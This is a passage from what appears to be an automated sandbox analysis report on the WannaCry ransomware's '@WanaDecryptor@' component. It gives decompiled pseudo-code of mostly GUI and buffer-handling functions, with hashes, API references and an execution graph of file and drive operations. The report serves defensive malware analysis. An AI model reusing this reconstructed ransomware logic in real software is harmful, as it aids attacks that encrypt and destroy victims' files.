                                                      					asm("movsw");
                                                      					asm("movsb");
                                                      					_t81 = _v508;
                                                      					_t95 = _a16;
                                                      				}
                                                      				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
                                                      				_t82 = _t81 + 1;
                                                      				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
                                                      				_t83 = _t82 + 1;
                                                      				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
                                                      				_v508 = _t83 + 1;
                                                      				_t46 = E00412B00(_t97, 0x1f);
                                                      				_t67 = _v508;
                                                      				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
                                                      				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
                                                      				if(_t48 < 0) {
                                                      					L12:
                                                      					return _t48 | 0xffffffff;
                                                      				} else {
                                                      					E0040D5A0(_t63, _t97);
                                                      					_push( &_v528);
                                                      					_push( &_v520);
                                                      					_push( &_v521);
                                                      					_v528 = 0x1f4;
                                                      					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
                                                      						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
                                                      						goto L12;
                                                      					} else {
                                                      						if(_t95 == 0) {
                                                      							L10:
                                                      							return 0;
                                                      						} else {
                                                      							_push(1);
                                                      							_push(_v536);
                                                      							_push( &_v528);
                                                      							_push(2);
                                                      							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
                                                      								goto L10;
                                                      							} else {
                                                      								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}

























                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                                      • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
                                                      				void* _t15;
                                                      				signed int _t23;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				_t23 = _a12;
                                                      				_t33 = _a4;
                                                      				_push(_t23);
                                                      				_push(_a8);
                                                      				_t34 = __ecx;
                                                      				_push(_t33);
                                                      				L00412D6A();
                                                      				if(_t23 > 6) {
                                                      					L12:
                                                      					return _t15;
                                                      				} else {
                                                      					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
                                                      						case 0:
                                                      							_push( *((intOrPtr*)(__ecx + 0x824)));
                                                      							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
                                                      							L00412D64();
                                                      							if(_t17 == 0x402) {
                                                      								L6:
                                                      								_push(0xe0e0);
                                                      								 *((intOrPtr*)( *_t33 + 0x38))();
                                                      							} else {
                                                      								L00412D64();
                                                      								if(_t17 == 0x3fe) {
                                                      									goto L6;
                                                      								} else {
                                                      									L00412D64();
                                                      									if(_t17 == 0x3fb) {
                                                      										goto L6;
                                                      									} else {
                                                      										_push(0xffffff);
                                                      										 *((intOrPtr*)( *_t33 + 0x38))();
                                                      									}
                                                      								}
                                                      							}
                                                      							_t35 =  *((intOrPtr*)(_t34 + 0x828));
                                                      							if(_t35 != 0) {
                                                      								goto L11;
                                                      							}
                                                      							return 0;
                                                      							goto L13;
                                                      						case 1:
                                                      							goto L12;
                                                      						case 2:
                                                      							_push( *((intOrPtr*)(__esi + 0x824)));
                                                      							__ecx = __edi;
                                                      							 *((intOrPtr*)( *__edi + 0x34))();
                                                      							if(__esi != 0) {
                                                      								L11:
                                                      								return  *((intOrPtr*)(_t35 + 4));
                                                      							}
                                                      							return 0;
                                                      							goto L13;
                                                      					}
                                                      				}
                                                      				L13:
                                                      			}








                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3089$#4476
                                                      • String ID:
                                                      • API String ID: 2870283385-0
                                                      • Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                                      • Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
                                                      • Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                                      • Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
                                                      				char _v500;
                                                      				signed int _t22;
                                                      				signed int _t27;
                                                      				intOrPtr* _t32;
                                                      				void* _t40;
                                                      				void* _t43;
                                                      				void* _t44;
                                                      				void* _t45;
                                                      				void* _t46;
                                                      				void* _t49;
                                                      
                                                      				_t32 = __ecx;
                                                      				_push(0);
                                                      				L0041303E();
                                                      				srand(__eax);
                                                      				_t49 =  &_v500 + 8;
                                                      				_t22 = rand();
                                                      				asm("cdq");
                                                      				_t40 = 0;
                                                      				_t43 = _t22 % 0xc8 + 0x1f;
                                                      				if(_t43 <= 0) {
                                                      					L2:
                                                      					_t41 = _t49 + _t43 - 0x13;
                                                      					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
                                                      					_t44 = _t43 + 1;
                                                      					 *((char*)(_t49 + _t44 + 0x14)) = 0;
                                                      					_t45 = _t44 + 1;
                                                      					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
                                                      					_t46 = _t45 + 1;
                                                      					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
                                                      					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
                                                      					if(_t27 >= 0) {
                                                      						E0040D5A0(_t32, _t41);
                                                      						return 0;
                                                      					} else {
                                                      						return _t27 | 0xffffffff;
                                                      					}
                                                      				} else {
                                                      					goto L1;
                                                      				}
                                                      				do {
                                                      					L1:
                                                      					 *((char*)(_t49 + _t40 + 0xc)) = rand();
                                                      					_t40 = _t40 + 1;
                                                      				} while (_t40 < _t43);
                                                      				goto L2;
                                                      			}














                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                                      • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E00405180(void* __ecx, intOrPtr _a4) {
                                                      				intOrPtr _t10;
                                                      				intOrPtr _t19;
                                                      				void* _t26;
                                                      
                                                      				_t19 = _a4;
                                                      				_t26 = __ecx;
                                                      				_t10 =  *((intOrPtr*)(__ecx + 0x44));
                                                      				__imp___mbscmp(_t10, _t19);
                                                      				if(_t10 == 0) {
                                                      					return _t10;
                                                      				} else {
                                                      					_push(_t19);
                                                      					L00412DA0();
                                                      					 *((char*)(__ecx + 0x48)) = 1;
                                                      					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
                                                      						E00405800(__ecx, 0);
                                                      					}
                                                      					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
                                                      						E00405820(_t26, 0);
                                                      					}
                                                      					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
                                                      						return InvalidateRect( *(_t26 + 0x20), 0, 1);
                                                      					}
                                                      					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
                                                      				}
                                                      			}







                                                      APIs
                                                      • _mbscmp.MSVCRT ref: 00405191
                                                      • #860.MFC42(?), ref: 004051A1
                                                      • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                                      • String ID:
                                                      • API String ID: 497622568-0
                                                      • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                                      • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E00404430(intOrPtr __ecx, char _a8) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				char _v16;
                                                      				intOrPtr _t13;
                                                      				struct HICON__* _t16;
                                                      				struct HICON__* _t17;
                                                      				intOrPtr _t26;
                                                      
                                                      				_t26 = __ecx;
                                                      				_t13 =  *((intOrPtr*)(__ecx + 0x59));
                                                      				if(_t13 != 0) {
                                                      					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                                      						E00404530(__ecx);
                                                      					}
                                                      					if(E004045E0(_t26,  &_a8) == 0) {
                                                      						_t16 =  *(_t26 + 0x60);
                                                      					} else {
                                                      						_t16 =  *(_t26 + 0x5c);
                                                      					}
                                                      					_t17 = SetCursor(_t16);
                                                      					L00412CBC();
                                                      					return _t17;
                                                      				} else {
                                                      					_v16 = 0x10;
                                                      					if(__ecx != 0) {
                                                      						_t13 =  *((intOrPtr*)(__ecx + 0x20));
                                                      						_v8 = _t13;
                                                      					} else {
                                                      						_v8 = __ecx;
                                                      					}
                                                      					_v12 = 2;
                                                      					__imp___TrackMouseEvent( &_v16);
                                                      					 *((char*)(_t26 + 0x59)) = 1;
                                                      					L00412CBC();
                                                      					return _t13;
                                                      				}
                                                      			}











                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$CursorEventMouseTrack
                                                      • String ID:
                                                      • API String ID: 2186836335-0
                                                      • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                                      • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E00404CF0(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t13;
                                                      				intOrPtr* _t21;
                                                      				intOrPtr* _t22;
                                                      				intOrPtr _t27;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041384E);
                                                      				_t13 =  *[fs:0x0];
                                                      				_push(_t13);
                                                      				 *[fs:0x0] = _t27;
                                                      				_v20 = __ecx;
                                                      				_v4 = 0;
                                                      				_t21 = __ecx + 0x70;
                                                      				_v16 = _t21;
                                                      				 *_t21 = 0x415c00;
                                                      				_v4 = 3;
                                                      				L00412D52();
                                                      				 *_t21 = 0x415bec;
                                                      				_t22 = __ecx + 0x64;
                                                      				_v16 = _t22;
                                                      				 *_t22 = 0x415c00;
                                                      				_v4 = 4;
                                                      				L00412D52();
                                                      				 *_t22 = 0x415bec;
                                                      				_v4 = 0;
                                                      				L00412CC2();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t13;
                                                      			}












                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                                      • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#641#800
                                                      • String ID:
                                                      • API String ID: 2580907805-0
                                                      • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                                      • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00404170(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t12;
                                                      				intOrPtr* _t20;
                                                      				intOrPtr _t25;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413776);
                                                      				_t12 =  *[fs:0x0];
                                                      				_push(_t12);
                                                      				 *[fs:0x0] = _t25;
                                                      				_v20 = __ecx;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                                      				_v4 = 0;
                                                      				_t20 = __ecx + 0x48;
                                                      				_v16 = _t20;
                                                      				 *_t20 = 0x415c00;
                                                      				_v4 = 3;
                                                      				L00412D52();
                                                      				 *_t20 = 0x415bec;
                                                      				_v4 = 1;
                                                      				L00412CC2();
                                                      				_v4 = 0;
                                                      				L00412CC2();
                                                      				_v4 = 0xffffffff;
                                                      				L00412D94();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t12;
                                                      			}











                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                      • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#2414#795
                                                      • String ID:
                                                      • API String ID: 932896513-0
                                                      • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                                      • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
                                                      				intOrPtr* _t18;
                                                      				intOrPtr* _t22;
                                                      				intOrPtr _t23;
                                                      				intOrPtr _t30;
                                                      				intOrPtr* _t35;
                                                      				intOrPtr* _t37;
                                                      				void* _t40;
                                                      
                                                      				_t1 =  &_a12; // 0x40276a
                                                      				_t35 = _a8;
                                                      				if(_t35 ==  *_t1) {
                                                      					_t16 =  &_a4; // 0x40276a
                                                      					_t18 =  *_t16;
                                                      					 *_t18 = _t35;
                                                      					return _t18;
                                                      				} else {
                                                      					do {
                                                      						_t37 = _t35;
                                                      						_t35 =  *_t35;
                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
                                                      						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
                                                      						_t30 =  *((intOrPtr*)(_t37 + 0xc));
                                                      						if(_t30 != 0) {
                                                      							_t23 =  *((intOrPtr*)(_t30 - 1));
                                                      							if(_t23 == 0 || _t23 == 0xff) {
                                                      								_push(_t30 + 0xfffffffe);
                                                      								L00412C98();
                                                      								_t40 = _t40 + 4;
                                                      							} else {
                                                      								 *((char*)(_t30 - 1)) = _t23 - 1;
                                                      							}
                                                      						}
                                                      						_push(_t37);
                                                      						 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                                      						 *((intOrPtr*)(_t37 + 0x10)) = 0;
                                                      						 *((intOrPtr*)(_t37 + 0x14)) = 0;
                                                      						L00412C98();
                                                      						_t40 = _t40 + 4;
                                                      						_a8 = _a8 - 1;
                                                      					} while (_t35 != _a12);
                                                      					_t22 = _a4;
                                                      					 *_t22 = _t35;
                                                      					return _t22;
                                                      				}
                                                      			}











                                                      APIs
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825
                                                      • String ID: j'@
                                                      • API String ID: 41483190-370697233
                                                      • Opcode ID: 4b7a11e06f7b77b6c3f3455a4fa83ed2b0c26ddd3550b5a3317a6a2ed897b25e
                                                      • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                                      • Opcode Fuzzy Hash: 4b7a11e06f7b77b6c3f3455a4fa83ed2b0c26ddd3550b5a3317a6a2ed897b25e
                                                      • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00407650(void* __ecx, intOrPtr _a4) {
                                                      				intOrPtr _t3;
                                                      				void* _t4;
                                                      
                                                      				_t3 = _a4;
                                                      				if(_t3 != 0x3e9) {
                                                      					if(_t3 == 0x3ea) {
                                                      						_t3 =  *((intOrPtr*)(__ecx + 0x820));
                                                      						if(_t3 == 0) {
                                                      							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
                                                      						}
                                                      					}
                                                      					L00412CBC();
                                                      					return _t3;
                                                      				} else {
                                                      					_t4 = E004076A0(__ecx, 1);
                                                      					L00412CBC();
                                                      					return _t4;
                                                      				}
                                                      			}






                                                      APIs
                                                      • #2379.MFC42 ref: 00407692
                                                        • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                                      • #2379.MFC42(00000001), ref: 00407667
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$time
                                                      • String ID: Wana Decrypt0r 2.0
                                                      • API String ID: 2017816395-4201229886
                                                      • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                                      • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:3.9%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:1683
                                                      Total number of Limit Nodes:14
403bb2 fgets 5594 403c5f 5592->5594 5592->5595 5593->5566 5594->5589 5595->5589 5595->5592 5595->5594 5627 402650 MultiByteToWideChar 5595->5627 5719 404640 InitializeCriticalSection 5597->5719 5599 401eb6 5720 404640 InitializeCriticalSection 5599->5720 5601 401ec4 5601->5571 5721 4046f0 5602->5721 5604 402031 5605 402035 5604->5605 5606 402048 GlobalAlloc 5604->5606 5607 4046f0 12 API calls 5604->5607 5605->5573 5608 402061 5606->5608 5609 402066 GlobalAlloc 5606->5609 5607->5606 5608->5573 5610 402079 5609->5610 5610->5573 5612 403a32 GetLogicalDrives 5611->5612 5613 403adc 5611->5613 5617 403a48 5612->5617 5613->5574 5614 403a53 GetDriveTypeW 5615 403a81 GetDiskFreeSpaceExW 5614->5615 5614->5617 5615->5617 5616 403ace 5616->5574 5617->5614 5617->5616 5759 4026b0 5617->5759 5849 401fa0 5619->5849 5621 401f60 5858 404690 DeleteCriticalSection 5621->5858 5623 401f7a 5859 404690 DeleteCriticalSection 5623->5859 5625 401f8a 5625->5563 5626->5569 5630 402560 wcscpy wcsrchr 5627->5630 5629 40269a 5629->5595 5631 4025c9 wcscat 5630->5631 5632 402599 _wcsicmp 5630->5632 5633 4025bd 5631->5633 5632->5633 5634 4025ae _wcsicmp 5632->5634 5643 4020a0 CreateFileW 5633->5643 5634->5631 5634->5633 5636 4025eb 5637 402629 DeleteFileW 5636->5637 5638 4025ef DeleteFileW 5636->5638 5639 402634 5637->5639 5638->5639 5640 4025fa 5638->5640 5639->5629 5641 402617 5640->5641 5642 4025fe MoveFileW 5640->5642 5641->5629 5642->5629 5644 402143 GetFileTime ReadFile 5643->5644 5662 402139 _local_unwind2 5643->5662 5646 40217c 5644->5646 5644->5662 5647 402196 ReadFile 5646->5647 5646->5662 5648 4021b3 5647->5648 5647->5662 5649 4021c3 ReadFile 5648->5649 5648->5662 5650 4021ea ReadFile 5649->5650 5649->5662 5651 402208 ReadFile 5650->5651 5650->5662 5652 402226 5651->5652 5651->5662 5653 402233 CloseHandle CreateFileW 5652->5653 5654 4022f9 CreateFileW 5652->5654 5656 402264 SetFilePointer ReadFile 5653->5656 5653->5662 5655 40232c 5654->5655 5654->5662 5676 404af0 5655->5676 5658 402297 
